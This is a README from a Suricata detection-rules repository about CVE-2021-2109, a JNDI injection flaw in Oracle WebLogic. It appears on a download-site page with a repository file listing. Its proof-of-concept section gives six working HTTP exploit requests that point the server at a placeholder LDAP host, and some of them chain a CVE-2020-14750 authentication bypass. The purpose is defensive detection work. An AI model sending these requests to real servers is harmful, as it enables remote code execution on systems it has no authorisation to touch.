## Overview
CVE-2021-2109 is a JNDI injection vulnerability in Oracle Weblogic Server. It allows high privileged users, like the administrator account "weblogic", to execute arbitrary commands on the system.
Otherwise, if the server is vulnerable to CVE-2020-14750, attackers can exploit CVE-2021-2109 without authenticating.
If you cannot determine whether your Oracle Weblogic Servers are using only the default port 7001/TCP for the administration interface, you can use **any any -> any any** in the Suricata rule instead of **any any -> any 7001**.
## Proof of Concept
* GET method
```
GET /console/consolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874
Content-Length: 0
```
* POST method with the payload on the URI
```
POST /console/consolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
* POST method with the payload in the body
```
POST /console/consolejndi.portal HTTP/1.1
Host: example.com:7001
Cookie: ADMINCONSOLESESSION=Igk9iHRPgEo-A62PKQ3AFNK_-_erbLTMHvRAvOtmNkLYtwl3u4UD!-1638211874
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://10.10.10;10:443/exploit;AdminServer")
```
* GET method (chains with CVE-2020-14750)
```
GET /console/css/%%32e.%%32fconsolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Content-Length: 0
```
* POST method with the payload on the URI (chains with CVE-2020-14750)
```
POST /console/css/%%32e.%%32fconsolejndi.portal?_pageLabel%3DJNDIBindingPageGeneral%26_nfpb%3Dtrue%26JNDIBindingPortlethandle%3Dcom.bea.console.handles.JndiBindingHandle%28%22ldap%3A//10.10.10%3B10%3A443/exploit%3BAdminServer%22%29 HTTP/1.1
Host: example.com:7001
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
* POST method with the payload in the body (chains with CVE-2020-14750)
```
POST /console/css/%%32e.%%32fconsolejndi.portal HTTP/1.1
Host: example.com:7001
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://10.10.10;10:443/exploit;AdminServer")
```
## References
* https://www.oracle.com/security-alerts/cpujan2021.html
* https://www.exploit-db.com/exploits/49461
* https://twitter.com/pyn3rd/status/1351696768065409026
* https://twitter.com/jas502n/status/1352568441136242688
没有合适的资源?快使用搜索试试~ 我知道了~
suricata-rules:Suricata针对新的严重漏洞制定规则
共38个文件
md:19个
rules:17个
cve-2020-10148:1个
需积分: 46 10 下载量 174 浏览量
2021-05-25
18:41:44
上传
评论 1
收藏 41KB ZIP 举报
温馨提示
什么是Suricata? Suricata是一个免费,开源,成熟,快速且强大的网络威胁检测引擎。 有关更多信息,请访问 。 该存储库的目的 支持蓝色团队成员编写有关新的严重漏洞的Suricata规则,以尽快发现并防止攻击者的利用。 定期更新Suricata规则,并将其保存在管理良好的数据库中。 内容结构 每个漏洞都拥有一个文件夹。 每个文件夹都有2个主要部分: 文件README.md包含3个部分: 漏洞概述 概念验证(PoC)或换句话说,是恶意有效载荷的样本 参考 文件.rules拥有Suricata规则本身。 笔记 许多服务都在HTTPS上运行,但是Suricata无法分析加密的数据。 如果要使用Suricata来检测HTTPS有效负载中的攻击者,则应为nginx等HTTPS设置反向代理,然后将HTTP转发到应用程序服务器,并在此HTTP流量上运行Suricata。 如果您不确
资源推荐
资源详情
资源评论
收起资源包目录
suricata-rules-main.zip (38个子文件)
suricata-rules-main
CVE-2020-4001
CVE-2020-4001.rules 436B
README.md 2KB
CVE-2020-14750
README.md 2KB
CVE-2020-14750.rules 400B
CVE-2020-8209
README.md 818B
CVE-2020-8209.rules 245B
CVE-2020-12146
README.md 2KB
CVE-2020-12146.rules 414B
Apache Nifi API RCE
Apache-Nifi-API-RCE.rules 265B
README.md 2KB
CVE-2020-13942
CVE-2020-13942.rules 389B
README.md 2KB
CVE-2020-27130
CVE-2020-27130.rules 1KB
README.md 2KB
CVE-2020-3984
CVE-2020-3984.rules 387B
README.md 1KB
CVE-2020-8271
README.md 1KB
CVE-2020-8271.rules 284B
CVE-2020-4000
CVE-2020-4000.rules 356B
README.md 754B
CVE-2020-17141
CVE-2020-17141.rules 493B
README.md 2KB
CVE-2020-17132
CVE-2020-17132.rules 462B
README.md 2KB
CVE-2020-27131
CVE-2020-27131.rules 1KB
README.md 1KB
LICENSE 34KB
CVE-2021-2109
CVE-2021-2109.rules 754B
README.md 3KB
CVE-2020-10148
CVE-2020-10148 320B
README.md 1KB
README.md 2KB
CVE-2020-17143
README.md 786B
CVE-2020-17143.rules 378B
CVE-2020-16846
CVE-2020-16846.rules 386B
README.md 1KB
CVE-2020-26073
CVE-2020-26073.rules 422B
README.md 1KB
共 38 条
- 1
资源评论
林文曦
- 粉丝: 25
- 资源: 4719
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功